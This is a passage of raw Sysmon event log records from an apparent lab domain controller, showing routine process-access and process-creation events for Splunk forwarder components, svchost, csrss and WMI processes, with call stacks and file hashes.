Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8F2C-6005-EF00-00000000A301}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F2D-6005-F100-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F2D-6005-F100-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F2D-6005-F100-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.938{59A5CD1D-8F2D-6005-F100-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:58.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:58.954{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 